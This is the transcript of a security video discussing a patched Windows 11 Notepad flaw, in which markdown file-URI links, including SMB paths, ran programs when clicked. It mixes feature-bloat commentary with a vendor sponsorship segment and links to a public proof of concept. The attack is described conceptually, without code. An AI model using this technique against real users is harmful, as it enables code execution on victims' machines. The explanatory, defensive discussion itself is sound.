no f***ing way

This is a video I never thought I'd have to make. Uh, Windows 11 Notepad flaw lets files execute silently via markdown links. Now, while this headline is hilarious, and while the bug is very simple, I want to dive into some of like the FUD that's kind of floating around on on Twitter and Reddit about this bug, I think this bug is actually way less impressive and way less hilarious than people are making it out to be. But, I do want to highlight kind of this feature bloat issue we're running into with simple utilities, especially in Windows. Uh, and maybe we can talk about ways to get around that in in the future. And also, the sponsor of today's video is Threat Locker, and that matters a lot for kind of like the zero trust issue that this presents in the video. Microsoft has fixed a remote code execution vulnerability in Windows 11 Notepad that allowed attackers to execute local or remote programs by tricking users into clicking specifically crafted markdown links without displaying any Windows security warnings. Now, th this is actually true. I have a pocket that I'll go here and show in a second. But for a long time, guys, if you're not aware, right, Notepad used to be this utility that was very simple. It was a dumb utility where you put text into it and that was literally it. Uh, with the removal of Wordpad, which was the rich text format editor that Windows had for a long time. With the removal of that, they had to kind of add some new features to Notepad to allow it to render or edit uh different text editor types, right? So, one of the text types is Markdown. If you're not sure how markdown works, markdown is this really neat format that allows you to represent formatted text using unforatted text. You basically say, "Hey, here in the unrendered version, we're going to have a heading of level one." And we can say that that means that it's big, right? And so when you render it, it'll show this instead of this. It allows you to transport word like files without word like sizes. It's a very cool format. Now the issue obviously like anything is if you allow an external resource to be inside of that file like a link for example or an image uh you know if that link goes to a place that is potentially unsanitized it may lead to bigger issues right and so the vulnerability supposedly and again there isn't any like Microsoft resource confirming this but what I'm reading from pox online is that the remote code execution flaw basically is there is an unhandled file you URI that you can use that if you click on the link that contains a file URI, it will reach out and run that program. Right now, here you're like, oh, it's only running a local command.exe. Who cares? Well, if you, for example, were to have a pock like this, we can actually use network protocols like SMB, for example, to reach out over the network and download these files. So, this is actually pretty bad from a attacking perspective, right? If I'm able to convince a user to go here and click for talk, they have to control-click. Before the update that came out, this popup that says the link may be unsafe wouldn't have popped up, right? So, you know, there is a a user click involved. So, I click on this, but then I do want to highlight there is a security warning, right? The the vulnerability said no security warnings. Well, I'm going to actually run a file that is not signed by Microsoft or by some trusted publisher, right? And so as a result I will get this security warning but ultimately I can run the file and you know this is just me proving that I'm actually I have execution right it's a batch file but this could be an EXE it could be Python whatever okay so this bug does exist now I want to just highlight that I think the bug is not as impressive as people are making it out to be potentially like you get rce but you have to get the user not only to download the file but then open it as markdown in notepad and then to click and run the the the the the binary that gets popped up. Again, look, I got this prompt didn't exist, but this one still still pops up. So, this is, you know, a little bit of protection. I want to highlight there's a lot of people talking online about how like co-pilot being included into this and like Microsoft push for AI is like the reason for this bug. I don't think this bug came out because of AI. Like a bug like this where an external resource is not properly sanitized and allows a URI to do basically request forgery. That that isn't new, right? That isn't a thing that like has just began to exist because of AI and solification, right? What I do want to highlight though is this wouldn't have occurred if we just left Notepad alone and decided to not include new features into it, right? To not make it a markdown renderer, to not add new features to the thing. They put this very well on Hacker News. We've officially reached the logical conclusion of the feature bloat to vulnerability pipeline. For nearly 30 years, Notepad.exe exe was the gold standard for a dumb utility which was a simple win32 backed buffer for strings did exactly one thing display text exactly like pending literally a vulnerability in the way that notepad displayed text which is almost impossible to get wrong ass you like read the file size correctly this could never have happened okay now let's be real you can't stop zero days from happening but one thing you can do is defend against them with today's video sponsor Threat Locker threater is a zero trust endpoint protection platform designed around stopping hackers from getting a foothold in your network. Here we're on a workstation at Big Corp Incorporated LLC where a user has downloaded a suspicious PowerShell script and they're about to run it. Not great. Because Threat Locker knows the baseline of this computer using its learning mode where it learned what is allowed during a good baseline. Threat Locker will detect this and block the execution of the script. Someone in the sock for this network will get an alert and can either deny it or my favorite feature, allow it with Threat Locker's ring fencing technology. They can run the script, but deny access to other parts of the computer like the user's files or even deny internet access to the script. And the sock even gets the ability to run the script in a sandbox environment to see what it does before they either approve or deny the access. Using my link right here, go check out Threat Locker. And next time that zero trust comes up at your company, give Threat Locker a shot. Thanks again Threat Locker for sponsoring this video. Back to the video. The issue that I have with Notepad in its current state, and again, I don't blame any engineers for this. This is like a very like normal mistake to make. One way that people could have defended against this sort of thing is by using some sort of ring fencing zero trust technology to basically just say, hey, the notepad process should never reach out to the internet, right? It should not be able to go out and grab a file or even to leave the computer, right? Like this isn't good to the internet. It goes to like maybe like a local malicious store. But you know if you deny the notepad process access to the network stack this can't happen. Well the issue that arises is now because co-pilot exists on this computer and it has to make a call to Microsoft's like SSO to log in and like give you access to co-pilot because that is a thing it is now normal for notepad.exe potentially to reach out and touch the internet. We've created this weird feature bloat where because we have bloated so many features into software, it is now we are now unsure of like what privileges a process should have. Like previously if I migrated a DLL into a notepad process and ran malware in the process, right? If you see notepad.exe making network connections, you're hacked, right? That is like that is just how it is. But now we have this weird issue where it's like okay but like Notepad has co-pilot and like maybe the C-pilot DLL has sockets that you that connect to the internet like it's just this weird in inclusion of features that like make it very hard to reason about what matters from a defender standpoint. As we add new parsers and new features into these tools, it becomes very hard to limit the amount of privilege we give to these things because they are expected to do everything right. And the question, by the way, I'm sure you're all uh you're all asking, you know, would Rust have fixed this? Actually, no. Again, I don't know how this is integrated. I don't I don't know like what broke here, but like I'm imagining that there is probably a markdown rendering library that's written in Rust that has like wind32 backend. Um, and like if it renders images the same way that this does, this isn't like a memory corruption vulnerability issue, right? This is literally just like a failure to sanitize or like, you know, lack of threat modeling on where this renderer lives. uh so that when you click on it you get you know a call out and an execution. So would robust fix this? No. Anyway guys, yeah, I don't know. It's just like stop adding features to things that are not broken. Thanks for watching. Check out that gold plaque and then this new video. See you next time. Goodbye.

Go secure your notepad.exe with Threatlocker! https://go.lowlevel.tv/threatlocker2026 Next time you hear zero trust, give threatlocker a shot. PoC: https://github.com/BTtea/CVE-2026-20841-PoC 🏫 MY COURSES Sign-up for my FREE 3-Day C Course: https://lowlevel.academy 🧙‍♂️ HACK YOUR CAREER Wanna learn to hack? Join my new CTF platform: https://stacksmash.io ⌨️ KEYBOARD Like what you hear? Grab a Q5 at https://go.lowlevel.tv/keyboard 🔥COME HANG OUT Check out my other stuff: https://lowlevel.tv